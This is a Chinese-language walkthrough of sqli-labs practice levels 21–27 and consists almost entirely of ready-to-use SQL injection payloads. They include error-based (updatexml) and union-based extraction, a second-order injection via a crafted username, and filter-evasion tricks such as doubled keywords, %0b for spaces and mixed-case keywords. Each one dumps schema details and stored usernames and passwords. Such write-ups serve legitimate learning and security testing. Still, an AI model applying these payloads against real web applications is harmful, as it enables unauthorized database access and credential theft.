(注意:有些后面直接附上了答案)
Less 21
先找出 账号和密码
之后用火狐登录后 用burp拦截 之后
爆库名
1' or updatexml(1,concat(0x7e,(database())),0) or '
用小葵转制Base64编码发送
邮件刷新之后burp重新拦截
爆表名
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
爆列名
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
爆段名
1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '
Less 22
先找出 账号和密码
之后用火狐登录后 用burp拦截 之后
爆库名
1"or updatexml(1,concat(0x7e,(database())),0) or "
用小葵转制Base64编码发送
邮件刷新之后burp重新拦截
爆表名
1"or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or "
1" or 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'%23
爆列名
1"or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or "
爆段名
1" or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or "
Less 23
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
过滤了 # -- 相当于将他们替换为空字符
?id=-1' union select 1,database(),'3
此处讲解几个知识点:
id=-1,为什么要用-1,因为sql语句执行了两个select语句,第一个select为id的选择语句,第二个为我们构造的select语句。只有一个数据可以输出,为了让我们自己构造的数据可以正常输出,第一个select要没有结果,所以-1或者超过数据库所有数据都可以。
-1' union select 1,database(),'3,第一个'(单引号)闭合-1,第二个'(单引号)闭合后面的。这样将查询内容显示在username处。
此处可以报错注入,延时注入,可以利用or '1'='1进行闭合。
联合查询
获取数据库:
?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3
查看security库数据表:
?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3
查看users表的所有列:
?id=-1' union select 1,(select group_concat(username) from security.users limit 0,1),'3
?id=-1' union select 1,(select group_concat(password) from security.users limit 0,1),'3
报错 '型
报数据库
1' or updatexml(1,concat(0x7e,(database())),0) or '
报表名
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
报列名
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
报字段内容
1' or updatexml(1,concat(0x23,(select group_concat(id,username,0x23,password)from security.users)),0) or '
Less 24
本题先注册
账号填admin'or 1#,然后设置一个密码
然后修改密码以admin和新密码的身份进入
Less 25
本题中的or和and被过滤了所以要用到多重关键字(联合查询)
?id=1'aandnd 1=1%23
?id=1'oorrder by 3%23
求显示位
id=1' aandnd 1=2 union select 1,2,3%23
报数据库
id=1' aandnd 1=2 union select 1,database(),3%23
报表
id=1' aandnd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
报列名
id=1' aandnd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' aandnd table_name='users'%23
报字段内容
id=1' aandnd 1=2 union select 1,2,group_concat(username,0x23,passwoorrd) from security.users%23
Less 26
确认过滤了什么
过滤了or,and,/*,--,#,空格
确认过滤了#
http://localhost/sqli-labs/Less-26/?id=%231
确认过滤了or
http://localhost/sqli-labs/Less-26/?id=or1
确认过滤多行注释符
http://localhost/sqli-labs/Less-26/?id=/*1
确认过滤了单行注释
http://localhost/sqli-labs/Less-26/?id=--1
确认过滤了斜杠
http://localhost/sqli-labs/Less-26/?id=/1
确认过滤了反斜杠
http://localhost/sqli-labs/Less-26/?id=1\
确认过滤了空格
http://localhost/sqli-labs/Less-26/?id=1' ' '
注:空格被过滤用%0b代替
联合查询
找出显示位
id=1'aandnd%0b1=2%0bunion%0bselect%0b1,2,3%0boorr%0b'1
报数据库
id=1'aandnd%0b1=2%0bunion%0bselect%0b1,database(),version()%0boorr%0b'1
报表名
id=1'aandnd%0b1=2%0bunion%0bselect%0b1,2,group_concat(table_name)%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema='security
报列名
1'aandnd%0b1=2%0bunion%0bselect%0b1,2,group_concat(column_name)%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema='security'%0baandnd%0btable_name='users
报字段
1'aandnd%0b1=2%0bunion%0bselect%0b1,2,group_concat(username,0x23,passwoorrd)%0bfrom%0bsecurity.users%0bwhere'1'='1
xpath
报数据库
id=1'aandnd%0bupdatexml(1,concat(0x23,database()),1)%0b%0boorr%0b'1
报表名
id=1'aandnd%0bupdatexml(1,concat(0x23,(select%0bgroup_concat(table_name)%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema='security')),1)%0b%0boorr%0b'1
报列名
id=1'aandnd%0bupdatexml(1,concat(0x23,(select%0bgroup_concat(column_name)%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema='security'aandnd%0btable_name='users')),1)%0b%0boorr%0b'1
报字段
1'aandnd%0bupdatexml(1,concat(0x23,(select%0bgroup_concat(username,0x23,passwoorrd)from%0bsecurity.users)),1)%0b%0boorr%0b'1
Less 27
过滤了 select union 空格
报数据库
1'and%0b1=2%0bUnIon%0bSeLect%0b1,database(),3%0bor%0b'1
报表明
1'and%0b1=2%0bUnIon%0bSeLect%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security
报列名
1'and%0b1=2%0bUnIon%0bSeLect%0b1,group_concat(column_name),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0band%0btable_name='users
报字段内容
1'and%0b1=2%0bUnIon%0bSeLect%0b1,group_concat(username,0x23,password),3%0bfrom%0bsecurity.users%0bwhere%0b'1
or
1'and%0bupdatexml(1,concat(0x23,(SeLect%0bgroup_concat(username,0x23,password)from%0bsecurity.users)),1)%0b%0bor%0b'1
Less1-10题解https://blog.csdn.net/S123KO/article/details/100048575
Less11-20题解https://blog.csdn.net/S123KO/article/details/100048614